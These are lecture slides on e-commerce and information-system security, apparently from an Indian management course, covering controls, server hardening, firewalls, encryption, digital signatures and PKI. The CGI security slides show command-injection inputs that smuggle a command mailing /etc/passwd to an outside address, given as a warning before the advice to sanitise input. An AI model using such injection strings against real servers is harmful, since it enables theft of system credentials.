Information Systems – Security Issues Electronic Commerce - Security ArmyinKashmir site hijacked...
-
date post
18-Dec-2015 -
Category
Documents
-
view
215 -
download
0
Transcript of Information Systems – Security Issues Electronic Commerce - Security ArmyinKashmir site hijacked...
Information Systems – Security Issues• Electronic Commerce - Security
ArmyinKashmir site hijacked by ISI
Anti-Nuke Hackers break into BARC computers
National Informatics Center -- a treasure trove of Govt. India Information, site compromised
• All these stories have been on the front pages of major newspapers.
• If Internet is so insecure, How can we put our corporate information on Internet?
• For Commerce to thrive on Internet, both Clients and Vendors trust is required.
• In real-life commerce both parties can be sure of each other’s identities, the web is made of anonymous, unknown, geographically distributed people.
• Unfortunately, causes of failure are -- lack of awareness, lax application, and misconceptions
Prof. Bharat Bhasker, Indian Institute of Management Lucknow
THREATS TO INFORMATION SYSTEMS
• HARDWARE FAILURE, SOFTWARE FAILURE, ELECTRICAL PROBLEMS
• COMMUNICATIONS PROBLEMS• PERSONNEL AND ORGANISATIONAL
ACTIONS – SECURITY BREACHES
• ACCESS PENETRATION, PROGRAM CHANGES• THEFT OF DATA, SERVICES, EQUIPMENT
– USER ERRORS
• FIRE AND OTHER NATURAL DISASTER
Causes of Threats
• USER: Identification, Authentication, Subtle Software Modification
• PROGRAMMER: Disables Protective Features; Reveals Protective Measures
• MAINTENANCE STAFF: Disables Hardware Devices; Uses Stand-alone Utilities
• OPERATOR: Doesn’t Notify Supervisor, Reveals Protective Measures
SYSTEM QUALITY PROBLEMS
• SOFTWARE & DATA• BUGS: Program Code Defects or Errors• MAINTENANCE: Modifying a System in
Production Use; Can take up to 85% of Analysts’ Time
• DATA QUALITY PROBLEMS: Finding, Correcting Errors; Costly; Tedious– FBI found 54.1% of the records to be
inaccurate
DISASTER• LOSS OF HARDWARE, SOFTWARE, DATA
BY FIRE, POWER FAILURE, FLOOD OR OTHER CALAMITY– Disaster recovery provided by back-up
facilities for Mastercard, Visa, almost all banks and financial institutions
• FAULT-TOLERANT COMPUTER SYSTEMS: BACKUP SYSTEMS TO PREVENT SYSTEM FAILURE (Particularly On-line Transaction Processing)– duplication of hardware and software
CREATING A CONTROL ENVIRONMENT
• CONTROLS: Methods, Policies, Procedures to Protect Assets; Accuracy & Reliability of Records; Adherence to Management Standards– GENERAL– APPLICATION
GENERAL CONTROLS
• SOFTWARE• HARDWARE• COMPUTER OPERATIONS• DATA SECURITY• ADMINISTRATIVE: Ensure Controls Properly
Executed, Enforced• IMPLEMENTATION: Audit System Development
to Assure Proper Control, Management
APPLICATION CONTROLS
• INPUT• PROCESSING• OUTPUT
INPUT CONTROLS
• INPUT AUTHORIZATION: Record, Monitor Source Documents
• DATA CONVERSION: Transcribe Data Properly from one Form to Another
• BATCH CONTROL TOTALS: Count Transactions Prior to and After Processing
• EDIT CHECKS: Verify Input Data, Correct Errors
PROCESSING CONTROLS
• ESTABLISH THAT DATA IS COMPLETE, ACCURATE DURING PROCESSING
• RUN CONTROL TOTALS: Generate Control Totals Before & After Processing
• COMPUTER MATCHING: Match Input Data to Master Files
OUTPUT CONTROLS
• ESTABLISH THAT RESULTS ARE ACCURATE, COMPLETE, PROPERLY DISTRIBUTED
• BALANCE INPUT, PROCESSING, OUTPUT TOTALS
• REVIEW PROCESSING LOGS• ENSURE ONLY AUTHORIZED
RECIPIENTS GET RESULTS
DEVELOPING A CONTROL STRUCTURE• COSTS: Can be Expensive to Build;
Complicated to Use• BENEFITS: Reduces Expensive Errors,
Loss of Time, Resources, Good Will• RISK ASSESSMENT: Determine
Frequency of Occurrence of Problem, Cost, Damage if it Were to Occur
MIS AUDIT
• IDENTIFIES CONTROLS OF INFORMATION SYSTEMS, ASSESSES THEIR EFFECTIVENESS
• TRACE FLOW OF SAMPLE TRANSACTIONS; NOTE HOW CONTROLS WORK
• LIST, RANK WEAKNESSES• ESTIMATE PROBABILITIES, IMPACT• REPORT TO MANAGEMENT
Transaction Security
• Electronic Commerce - Security• Securing the Internet Commerce is akin to Securing
your business secrets and activities in real life
• Security Concern have to be addressed at three levels
– Security of the Host ( Where the business is hosted)– Security of the Server providing the service (
HTTP/Web Server)– Communication Environment
• Network Environment• Transaction Security
Prof. Bharat Bhasker, Indian Institute of Management Lucknow -
Electronic Commerce - Host Security• Site Security Handbook - RFC 1244 details-- How to secure a
Host computer from break-in• Seven Critical Principles--
– Parsimony ( Simplest possible) • Remove services that are not required
(HTTP,SMTP,POP3,IMAP...)• Remove all things from host that are not required
– Compilers, NFS Daemons, Interpreters, Shells– Superuser (Root) privileges– Access Control ( Authentication, privilege system)– Accountability (Securely log actions for Ids)– Audit & Auditability ( Any change anywhere is the systems)
• COPS, TAMU, TripWire– Notification ( CERT, CIAC, Alarm Systems)– Recovery ( It may happen, How to cope on morning-after?)
Electronic Commerce - Web Server Security
• Each HTTP Server has 4 configuration files– Access.conf Access Control– httpd.conf Server Configuration– mime.types File extension and meanings– srm.conf Options including directories and Users.
• Define in httpd.conf ServerRoot /var/httpd/• Define in srm.conf /var/httpdocs
Root
Serverroot
Documentroot
Electronic Commerce - Web Server Security• AUTHENTICATION BASED Service
• define in Access.conf – AuthUserFile /var/httpd/user ==> file is shorter version
on /etc/passwd» Content --- groucho:Ygk871woj
– AuthGroupFile /var/httpd/group» TeamA: mjr rubi groucho
– AccessFileName .accessfile (generally .htaccess)» Per directory controls one can ven download
the .accessfile– Allow and deny certain Host names (Wildcards), IP
Addresses– Host Names are susceptible to DNS spoofing– Server Side Includes => Allowing Execs will have security
issues similar to CGI. Any passed string parameters can be exploited.
Electronic Commerce - CGI Security
• Three ways to break into a Web Server– Host Security fails; Some other service failure that runs
on same server– Hyper Text Transfer Protocol-- Clever messages to exploit
bugs, e.g., opening ../..? In Microsoft IIS crashed the server. (Denial of Service attack)
– Exploiting the weakness in CGI programs• A Closer look at the CGI Program - Variable set and Stdin
– SERVER_SOFTWARE – SERVER_PROTOCOL – SERVER_PORT – REQUEST_METHOD – PATH_INFO – QUERY_STRING – REMOTE_HOST – REMOTE_ADDR – CONTENT_TYPE – HTTP_ACCEPT – HTTP_REFERER
Electronic Commerce - CGI Security
• Many of these variables can be spoofed, CGI program has to be careful. The data of GET method comes in QUERY_STRING user can pass anything in the form fields. Same is the case with PUT, except that the data is read from stdin.
• A simple CGI to search for a string in a file can be written as – system(“/usr/bin/grep $string /usr/local/database/file)– What if user passes
• alpha beta; /bin/mail [email protected] </etc/passwd; more commands;
• ANY CGI, SSI will suffer from this drawback.– If (HTTP_REFERER) { Give credit to the site}– User passes HTTP_REFERER as /bin/mail
[email protected]</etc/passwd• Sanitize anything you get from CGI User
– $CLEAN_INPUT= `unescape $DIRTY_INPUT’– Restrict access to CGI, place it all in one directory (you can scan
it for errs)– use SafeCGI like utilities
Electronic Commerce - Secure the Fort (Firewalls)• Digging a deep moat around your palace• Design forced everyone to entering or leaving the palace
to pass through a single drawbridge.
• Companies can have several LANs, but the connection to outside world is restricted through a limited doorways, called Firewalls
• Firewalls have two components – Two routers – Application gateways
• The route to outside world exist through this passageway.
• First router is used for incoming packet filtering • The second internal router for outgoing packet filtering
along with application gateway acts as additional screening for limited offered services
Electronic Commerce - Secure the Fort (Firewalls)
Electronic Commerce - Secure the Fort (Firewalls)
Electronic Commerce - Transaction Security• E-commerce transaction security problems are of four types
– Secrecy– Authentication
• Ability to identify whom are you talking to, before revealing business secrets are entering in a business deal
– non-repudiation• How do you prove that the electronic order was placed
for 500 cards at Rs5.00 each, when later on party denies placing it or at a lower price. It deals with those “signed deals”.
• How can you be sure before scheduling production of a custom order, that it was not a trick by a malicious adversary.
– integrity control• In real life we deal with these issues too. Secrecy and integrity
using registered mails, locking the documents up• Original documents address the non-repudiation &
Authentication is addressed by recognizing faces,voices, signs etc.
Symmetric Encryption Example
Dear Bob:
How about comingover to my placeat 1:30? If Tedever finds out weare meeting likethis it could bedisastrous.
Love, Alice
Dear Bob:
How about comingover to my placeat 1:30? If Ted ever finds out we are meeting like this it could bedisastrous.
Love, Alice
Alice Bob
decryptencrypt011100111001001110011100111001001110000111111
ciphertext
Symmetric Encryption Issues
• Key (shared secret) vulnerable to discovery
• Need to share a unique secret key with each party that you wish to securely communicate– Key management becomes
unmanageable
Asymmetric Encryption
• Two mathematically related keys– Unable to derive one from the other – Encrypt with one – decrypt with other
• Public Key Cryptography– One (public) key published for all to see– Other (private) key kept secret
• Algorithms– RSA - Integer Factorization (large primes)– Diffie-Hellman - Discrete Logarithms– ECES - Elliptic Curve Discrete Logarithm
Asymmetric Encryption Example
Dear Carol:
I think Alice ishaving an affairwith Bob. I need to see youright away.
Love, Ted
Dear Carol:
I think Alice ishaving an affairwith Bob. I need to see youright away.
Love, Ted
Ted Carol
encrypt decrypt
Carol'sPrivate Key
Carol'sPublic Key
011100111001001110011100111001001110000111111
ciphertext
Asymmetric Advantages
• No shared secret key• Public key is public
– Can be freely distributed or published– Key management is much easier
• Private key known ONLY to owner– Less vulnerable, easier to keep secret
• Supports Non-repudiation– Sender can not deny sending message
Electronic Commerce - Integrity
Message Digest - Public Key System
• If secrecy of document is not the issue, A sends P, Da(MD(P)).
• Trudy intercepts and modifies P to P’, B use Eb(MD(P)) to get to MD(P), Computes MD(P’) two values won’t match.
AliceAlice BankBankP,Da(MD(P))
Prof. Bharat Bhasker, Indian Institute of Management Lucknow -
Asymmetric Non-Repudiation
Dear Ted:
Please leave mealone or I willcontact a lawyer.I do not care aboutyour personal life.
Carol
Ted Carol
decrypt
Carol'sPublic Key
Dear Ted:
Please leave mealone or I willcontact a lawyer.I do not care aboutyour personal life.
Carol
Carol'sPrivate Key
encrypt011100111001001110011100111001001110000111111
ciphertext
Non-repudiation
• Since only the sender knows their private key, only the sender could have sent the message.
• Authentication mechanism• Basis for Digital Signature
Asymmetric Issues
• More computationally intensive– 100x symmetric encryption
• Generally not used to encrypt data– Encrypt symmetric key (S/MIME)– SSL session key
S/MIME Encryption
Dear Carol:
Please do notpush me away.I love you morethan I do Alice.
Love, Ted
encrypt
Carol'sPublic Key
encrypt011100111011001110010011100001
A032F17634E57BC43356743212b9c98FA29173425633A22201807732ECF13344567520ABCE4567CD
decrypt
Carol'sPrivate Key
decrypt
Dear Carol:
Please do notpush me away.I love you morethan I do Alice.
Love, Ted
Digital Signature
• Type of Electronic Signature• Combines one-way secure hash functions
with public key cryptography– Hash function generates fixed length value– No two documents produce the same hash value– Secure Hash Algorithm 1 (SHA-1)
• Characteristics– Data Integrity - hash value– Non-repudiation – encrypted with private key– Does NOT provide confidentiality
Digital Signature Creation
Dear Mr. Ted:
We have asked theCourt to issue a restraining order against you to stayaway from Carol.
Sincerely,
Sue YewDewey, Cheatam & Howe, Law Firm
Dear Mr. Ted:
We have asked theCourt to issue a restraining order against you to stayaway from Carol.
Sincerely,
Sue YewDewey, Cheatam & Howe, Law Firm
encrypt
Sue'sPrivate Key
HashFunction
Sue
0F47CEFFAE0317DBAA567C29
HashValue
01010111100001101011011110101111010111
DigitalSignature
Digital Signature Validation
Dear Mr. Ted:
We have asked theCourt to issue a restraining order against you to stay away from Carol.
Sincerely,
Sue YewDewey, Cheatam & Howe, Law Firm
01010111100001101011011110101111010111
Sue'sPublic Key
decrypt 0F47CEFFAE0317DBAA567C29
0F47CEFFAE0317DBAA567C29 Signature is valid
if the two hashesmatch
Source of Public Key
• Keys can be published anywhere• Attached as a signature to e-mail
– Pretty Good Privacy (PGP)
-----BEGIN PGP SIGNATURE-----Version: PGP 7.0.4
iQCVAwUBOx6SgoFNSxzKNZKFAQGK+gP6AnCVghZqbL3+rM5JMSqoC5OEYIkbvYZN92CL+YSCj/EkdZnjxFmU9+wGsWiCwxvs/TzSX6SZxlpG1bHFKf0OPu7+JEfJ7J5zcPCSqbFXiXzmukMl5KNx0p0veIDW4DmwleDpkmhT05qnCheweoNyvTSzfA1TGeLlmpjBi6zUjiY==Xq10-----END PGP SIGNATURE-----
But
• How do you know for sure who is the owner of a public key?
Public Key Infrastructure
Public Key Infrastructure (PKI) provides themeans to bind public keys to their owners and helps in the distribution of reliable public keys in large heterogeneous networks. NIST
The set of hardware, software, people, policies and procedures needed to create, manage, store, distribute, and revoke Public Key Certificates based on public-key cryptography. IETF PKIX working group
Public Key Certificates
• Digital Certificates– Binds a public key to it's owner– Issued and digitally signed by a
trusted third party– Like an electronic photo-id
• Follows X509 V3 standard – RFC 2459
X509 V3 Basic Fields
• Owner's X.500 distinguished name (DN)– C=IN;O=GOV,OU=IIML;CN=Bharat Bhasker
• Owner's public key • Validity period• Issuer's X.500 distinguished name
X509 V3 Extensions
• Location of certificate status information• Location of Issuer's certificate• Subject's Alternative Name
– email address, employee ID
• Key Usage constraints– Only for digital signatures– Only for encryption
• Policy information – Level of trust
X.509 V3 Certificate
Version 2 (V1=0, V2=1, V3=2)
Serial Number 56
Signature Algorithm sh1RSA
Issuer DN C=IN;S=UP;O=MIT;OU=MIT CA;CN=RootCA
Validity Period 05/02/2000 08:00:00 to 05/02/2001 08:00:00
Subject DN C=IN;O=GOV;O=IIM;OU=IIML;CN=Bharat Bhasker
Subject Public Key RSA, 3081 8902 8181 … 0001
Issuer UID Usually omitted
Subject UID Usually omitted
Extensions Optional Extensions
Signature Algorithm sh1RSA (same as above)
Signature 302C 0258 AE18 7CF2 … 8D48
How a PKI Issues Certificates
Subscriber RACredentials
PasscodePublic Key
Certificate containing KeySigned by CA
Repository
Passcode
CA
Subscriber'sCredentialsPasscode
Who do you Trust?
• Everyone trusts their CA – Trust all certificates issued by their CA
CA
George Martha Clark
Single CA model does not scale well Difficult to manage across large or diverse
user communities
Certification Path
Root CARoot CA
Certificate Info
Root Signature
Sub CARoot Signature
Subordinate CACertificate Info
Root CA's Private Key
Root CA's Private Key
Subordinate CA's Private Key
SubCA's Signature
SubscriberCertificate Info
Subscriber's Signature
TextDocument Subscriber's Private Key
Self Signed